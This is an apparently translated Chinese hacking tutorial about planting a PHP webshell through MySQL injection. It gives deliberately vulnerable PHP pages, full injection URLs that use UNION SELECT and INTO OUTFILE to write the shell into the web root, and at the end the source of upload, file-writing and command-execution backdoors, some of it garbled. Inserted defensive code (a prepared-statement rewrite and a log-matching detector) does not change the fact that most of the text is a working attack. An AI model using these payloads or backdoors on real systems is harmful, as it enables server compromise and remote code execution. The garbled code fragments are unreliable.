Research on exporting field contents in MySQL injection: exporting a webshell through injection (security tutorial)

Source: Internet
Author: User
The biggest limitation here is inserting data: we can only work with the program's existing functionality. In practice many programs let users submit comments, messages, posts and so on; the question is how the program inserts those variables into the database. The road is right around us; we only have to open it up ourselves.
Needless to say, first look at a simple example. For a local test, create a table with the following structure:
CREATE TABLE `article` (
  `articleid` INT NOT NULL AUTO_INCREMENT,
  `title` VARCHAR(255) NOT NULL,   -- the column length is missing from the page; 255 assumed
  `content` TEXT NOT NULL,
  `visible` INT DEFAULT '1' NOT NULL,
  PRIMARY KEY (`articleid`)
);
The file for browsing articles, show.php, is as follows:
<?php
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "injection";
mysql_connect($servername, $dbusername, $dbpassword) or die("database connection failed");
$id = $_GET['id'];   // the original relies on register_globals; $id is deliberately left unfiltered
$sql = "SELECT * FROM article WHERE articleid=$id AND visible=1";
$result = mysql_db_query($dbname, $sql);
$row = mysql_fetch_array($result);
if (!$row) {
    echo "The record does not exist";
    echo "<p>SQL Query: $sql<p>";
    exit;
}
function html_clean($content) {
    $content = htmlspecialchars($content);
    $content = str_replace("\n", "<br>", $content);
    $content = str_replace(" ", "&nbsp;", $content);                   // reconstructed: the replacement strings are garbled on the page
    $content = str_replace("\t", "&nbsp;&nbsp;&nbsp;&nbsp;", $content);
    return $content;
}
echo "<title>" . $row['title'] . "</title>";
echo "<b>Title:</b>" . htmlspecialchars($row['title']);
echo "<b>Content:</b><p>" . html_clean($row['content']) . "</p>";
echo "SQL Query: $sql";
?>
The file through which visitors submit articles, add.php, is as follows:
<?php
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "injection";
mysql_connect($servername, $dbusername, $dbpassword) or die("database connection failed");
$title = $_POST['title'];       // the original relies on register_globals; both values go into the query unescaped
$content = $_POST['content'];
if ($_POST['action'] == "add") {
    if ($title == "" or $content == "") {
        echo "You haven't filled out the form yet.";
        exit;
    } else {
        $sql = "INSERT INTO article (title,content,visible) VALUES ('$title', '$content', '0')";
        // If the visible field is 1, the article is displayed.
        // Since it is submitted by a visitor it is inserted as 0; after the admin audits it, it is updated to 1.
        mysql_db_query($dbname, $sql);
        mysql_close();
        echo "You have completed your submission and are awaiting administrator approval.";
        exit;
    }
}
?>
<form action="add.php" method="POST">
Article title: <br><input name="title" type="text"><p>
Article content: <br><textarea name="content"></textarea><p>
<input type="hidden" name="action" value="add"><input type="submit" value="Submit">
</form>
Many programs put the user's data straight into the database and only process it with a function when it is displayed, like show.php above. This gives us a chance: our webshell is written into the database. Very few programs process data before inserting it into the database; vBB stores it directly.
We visit add.php and submit our code as the article content. At this point the article is hidden, so how do we know its id? It is actually very simple:
http://127.0.0.1/injection/show.php?id=2
# This browses a normal article; if the article is not visible, the "does not exist" message appears.
http://127.0.0.1/injection/show.php?id=2/*
# This comments out the visible condition, so the hidden article is displayed.
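A hardened show.php, as an added example rather than code from the original article: the id is validated as an integer and bound through a mysqli prepared statement, so neither the trailing `/*` nor an appended `into outfile` ever becomes part of the query. The mysqli extension, the table layout above, and a low-privilege database user without the FILE privilege are assumptions.

```php
<?php
// Added example (not from the original article): hardened show.php.
// Assumptions: mysqli extension, the article table defined above, and a
// dedicated DB user "webapp" that has no FILE privilege (so INTO OUTFILE
// would fail even if an injection slipped through somewhere else).
$mysqli = new mysqli("localhost", "webapp", "<password-placeholder>", "injection");
if ($mysqli->connect_error) {
    exit("database connection failed");
}

// 1. Validate: the id must be a positive integer. "2/*" or
//    "2 into outfile 'f:/www/1.php'/*" are rejected before any SQL is built.
$id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
if ($id === false || $id === null) {
    http_response_code(400);
    exit("invalid article id");
}

// 2. Parameterise: the query text is fixed and the id is bound as an
//    integer, so the "AND visible=1" check can no longer be commented out.
$stmt = $mysqli->prepare("SELECT title, content FROM article WHERE articleid = ? AND visible = 1");
$stmt->bind_param("i", $id);
$stmt->execute();
$stmt->bind_result($title, $content);
if (!$stmt->fetch()) {
    // No SQL text is echoed back; the original page's debug output is what
    // told the attacker the statement parsed and how many columns it had.
    exit("The record does not exist");
}
$stmt->close();

// 3. Escape on output: whatever add.php stored is untrusted regardless of
//    magic_quotes_gpc or any filtering done at insert time.
function html_clean(string $text): string {
    return nl2br(htmlspecialchars($text, ENT_QUOTES, 'UTF-8'));
}

echo "<title>" . htmlspecialchars($title, ENT_QUOTES, 'UTF-8') . "</title>";
echo "<b>Title:</b> " . htmlspecialchars($title, ENT_QUOTES, 'UTF-8');
echo "<b>Content:</b><p>" . html_clean($content) . "</p>";
```

On the database side the same effect can be reinforced by not granting the application user FILE and by setting secure_file_priv, so that a successful injection still cannot write files into the web root.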

Look at the SQL query in the picture: as long as we comment out the condition that follows, we can change the id to find our article. What we submitted just now was the complete code of a small upload backdoor I wrote; it lets you upload any type of file into the script's directory, but the size cannot exceed the limit set in php.ini.
Now that the code has been written in, we start constructing our into outfile statement. As long as it is constructed correctly, the exported file will obediently lie in the predetermined directory. How to find the web root's absolute path and how to find a directory with write permission are outside the scope of this article; I believe neither is difficult for anyone. Submit:
http://127.0.0.1/injection/show.php?id=2 into outfile 'f:/www/1.php'/*
Returns the following prompt:

Did you see that? The SQL statement is correct, and despite the error prompt, the file must have been exported as long as the directory exists and is writable:

The backdoor we uploaded also works normally, because the PHP code was not damaged. Going one step further: even if the quotation marks in the form are mangled, we can construct the form locally.

Example
I believe that by this point you have some understanding of, and ideas about, injecting a webshell. The above is the simplest and smoothest example. The conditions seem harsh but are actually found everywhere; the method seems simple but actually leaves a lot of room for use, and if used flexibly the harm is not small. Let's look at a more practical example, which can be seen as a complete penetration test.
Since I cannot get online right now, I will build a local copy of the http://www.4ngel.net site to penetrate. All databases and files are the same as on the Internet (the articles and the forum share one database), backed up by me the day before yesterday. I have now removed the $id filtering code from showarticle.php, which turns it into a vulnerable site (a bit unfair to it, sob).

Note: the current environment has MAGIC_QUOTES_GPC = off. Some programs do their own processing of input variables, such as vBB, so for them it does not matter whether GPC is on or off.
The whole site has nowhere to submit articles, messages or comments, so we cannot submit our code through the site itself. Fortunately there is a forum, where many places accept our data: posts, signatures and so on. We write the webshell code into the signature.

Then, through the injection point on the article page, we can query the signature content across tables and export it. Once we have a webshell, even with safe_mode in the way, penetrating the server is basically no problem. As the 5th picture above shows, the article query has 5 fields, so we use a UNION query; I explained UNION queries thoroughly in my "SQL injection with MySQL", so I will not elaborate here. After the UNION we also specify 5 fields, "1,1,1,1,1". The user Angel is in the user table with userid 1, and if the construction is correct the user exists and the page returns normally:
http://127.0.0.1/showarticle.php?id=25' union select 1,1,1,1,1 from user where userid=1/*

Let's see whether we can really query the content of the forum signature. From the SQL error we just saw, we know that the article content is the 5th field, and the signature field is named "signature". We replace the 5th 1 with "signature" and give the preceding $id a value that does not exist, so that the signature content is displayed where the article content was originally displayed. Construct:
http://127.0.0.1/showarticle.php?id=55' union select 1,1,1,1,signature from user where userid=1/*

Well, the query succeeded; let's start exporting. My local web directory is f:/www, which I know; as for how to get the web root's absolute path in real use, do not ask me.
Take the statement we just constructed, add into outfile at the end, and submit:
http://127.0.0.1/showarticle.php?id=55' union select 1,1,1,1,signature from user where userid=1 into outfile 'f:/www/angel.php'/*
Well, there was an error, but no matter: we made no construction errors, and my F: drive gives full control to Everyone. Naturally our angel.php came out:

Seemingly complex things are in fact easy to grasp; the most important thing is flexibility, combining the program's code with PHP's features in a variety of ways. One thing to note: if you want to export data, the single quotes must not be broken, whether by the program's own code or by magic_quotes_gpc; once single quotes are escaped, the success rate is almost zero.
Please do not use the Security Angel site for practice: since this article is my own writing, my site will not have this problem.
Postscript
I hope this article is useful. Deeper techniques are for us to explore ourselves. If this article has any errors or omissions, or there is something you do not understand, you can come to the Security Angel forum and discuss it with me. Attached below are some PHP backdoors I wrote and often use; I had only just started learning PHP at the time, so the code below may have many problems. If you want a more powerful PHP backdoor, I recommend downloading the phpspy I developed.
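From the defender's side, the requests used throughout this article leave a recognisable trace in the web server log: a single quote glued to a numeric id, a trailing `/*`, `union select`, and `into outfile`. The following is an added example, not code from the original article; it runs a few such rules over constructed common-log-format lines and the rule names and sample lines are my own.

```php
<?php
// Added example (not from the original article): flag access-log requests
// shaped like the injection / into-outfile attempts described above.
// The log lines are constructed for this example.
$accessLog = [
    '127.0.0.1 - - [01/Jan/2008:10:00:00 +0800] "GET /injection/show.php?id=2 HTTP/1.1" 200 512',
    '127.0.0.1 - - [01/Jan/2008:10:00:05 +0800] "GET /injection/show.php?id=2/* HTTP/1.1" 200 640',
    '127.0.0.1 - - [01/Jan/2008:10:00:09 +0800] "GET /injection/show.php?id=2%20into%20outfile%20%27f:/www/1.php%27/* HTTP/1.1" 200 700',
    '127.0.0.1 - - [01/Jan/2008:10:01:00 +0800] "GET /showarticle.php?id=55%27%20union%20select%201,1,1,1,signature%20from%20user%20where%20userid=1/* HTTP/1.1" 200 900',
];

// Each rule is applied to the URL-decoded query string.
$rules = [
    'into_outfile' => '/\binto\s+(?:out|dump)file\b/i',
    'union_select' => '/\bunion\s+(?:all\s+)?select\b/i',
    'comment_tail' => '/\/\*\s*$/',            // trailing /* that cuts off "AND visible=1"
    'quote_on_id'  => '/(?:^|&)id=\d*\'/',     // a single quote directly after a numeric id
];

function find_injection_attempts(array $lines, array $rules): array {
    $hits = [];
    foreach ($lines as $line) {
        // Pull the request target out of the "METHOD target HTTP/x" field.
        if (!preg_match('/"(?:GET|POST)\s+(\S+)\s+HTTP/', $line, $m)) {
            continue;
        }
        $query = parse_url($m[1], PHP_URL_QUERY);
        if ($query === null || $query === false) {
            continue;
        }
        $decoded = rawurldecode($query);       // payloads arrive percent-encoded
        $matched = [];
        foreach ($rules as $name => $re) {
            if (preg_match($re, $decoded)) {
                $matched[] = $name;
            }
        }
        if ($matched) {
            $hits[] = ['query' => $decoded, 'rules' => $matched];
        }
    }
    return $hits;
}

// Lines 2 to 4 are reported; the plain id=2 request is not.
foreach (find_injection_attempts($accessLog, $rules) as $hit) {
    echo implode(',', $hit['rules']) . "  " . $hit['query'] . "\n";
}
```

Because show.php echoes the failing SQL back to the visitor, a 200 response with "SQL Query:" in the body is a second signal worth alerting on; the prepared-statement version removes that output entirely.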
PHP upload-type backdoor
<?php
Codz by Angel
<form action="" method="POST">
<input name="myfile" type="file">
<input value="Submit" type="submit"></form>
PHP file generation-type backdoor
<?php
Codz by Angel) {
    $fp = @fopen("" . $_POST['filename'] . "", "wb");
    $content = $_POST['filedate'];
    $fw = @fwrite($fp, $content);
    if ($fw) {
        echo "<b>Congratulations, the file was written successfully!</b><a href=\"" . $PHP_SELF . "\">Return</a>";
        exit;
    } else {
        echo "<b>Failed to write the file. Is it a permission issue?</b><a href=\"" . $PHP_SELF . "\">Return</a>";
        exit;
    }
    @fclose($fp);
}
?>
<form action="" method="POST">
Saved file name (for example: <font color="#FF0000">angel.php</font>):<br>
<input type="text" name="filename">
<p>
File location: <br><?=str_replace('\\', '/', dirname(__FILE__))?>
<p>
File contents:
<br><textarea name="filedate"></textarea><br>
<input type="hidden" name="action" value="create"><input type="submit" value="Save">
</form>
<b>Note: when a file with the same name exists, its contents will be completely overwritten!</b>
Command execution backdoor
<?php
Codz by Angel method="POST">
Command:<br>
<input type="text" name="command" <?php if ($command) { echo "value=\"$command\""; } ?>> <input name="submit_btn" type="submit" value="Execute"></p>
Execution results:<br>
<textarea readonly><?php if ($command) { system($command); } ?></textarea><p>
Note: on Windows hosts some commands may be restricted</form>